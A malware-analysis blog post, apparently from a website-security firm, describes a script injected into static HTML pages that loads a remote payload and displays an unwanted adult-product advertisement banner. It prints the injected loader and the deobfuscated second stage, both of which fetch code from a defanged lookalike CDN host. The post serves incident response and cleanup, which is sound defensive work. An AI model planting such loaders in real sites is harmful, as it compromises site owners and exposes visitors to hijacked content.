Unwanted Sex Toys Advertisement

  • November 8, 2016
Labs Note

Recently, during an incident response process, we have found an advertisement floating banner on specific pages of an html-based website. Despite what people think, these websites are also targets of attacks and can be infected.

Different from other platforms, the entry point in this scenario is easier to be detected due to the nature of html-based pages (static content) and the reduced number of components that could make the website prone to a particular vulnerability.

The following banner was inadvertently added into the victim’s website and floating through different pages:

After a quick investigation, we found that it was being triggered by the following code:

 <script>    (function(d, s, id) {       var js, fjs = d.getElementsByTagName(s)[0];       if (d.getElementById(id)) return;       js = d.createElement(s);       js.id = id;       js.src = "//cdn[.]googletoolservices[.]com/jquery-ui[.]js";       fjs.parentNode.insertBefore(js, fjs);    }(document, 'script', 'jquery-uisdk'));</script>

The code above is just the first stage of the attack. It accesses the website: cdn[.]googletoolservices[.]com/jquery-ui[.]js and fetches the malicious payload, which is obfuscated with JS Packer compression. After deobfuscating it, we get this script:

var x113110_hit;if (typeof(x113110_hit) == "undefined") {<    (function() {       var params = {};...       var args = '';       for (var i in params) {           if (args != '') {               args += '&'           }           args += i + '=' + encodeURIComponent(params[i])       }       var st = document.createElement('script');       st.type = 'text/javascript';       st.async = true;       st.charset = 'utf-8';       st.src = '//cdn[.]googletoolservices[.]com/jquery[.]js?' + args;       var s = document.getElementsByTagName('script')[0];       s.parentNode.insertBefore(st, s);       x113110_hit = true    })()}

Which renders out the image-based floating banner, leading to an adult toys website when clicking on it (hxxp://www.la-pareja.com/?qn).

This malware could be injected in several pages of the website but not necessarily in all of them, so it’s important to check all html pages for that particular code and more specifically the link

‘cdn[.]googletoolservices[.]com/jquery-ui[.]js’.

If you’re experiencing similar issues in your website and want it to be cleaned up, let us know.

Eugene Wozniak is Sucuri’s Security Analyst who joined the company in 2016. His main responsibilities include finding malware providing efficient cleanup procedures for Sucuri’s customers, and outlining working solutions for website security. Eugene`s professional experience covers more than a decade of web hosting experience, helpdesk support and web hosting security. When Eugene isn’t working on customers’ security, you might find him creating 3-D art for games and various indie projects, or revisiting his world in Stalker Lost Alpha. Connect with him on LinkedIn.

Related Tags
Related Categories
You May Also Like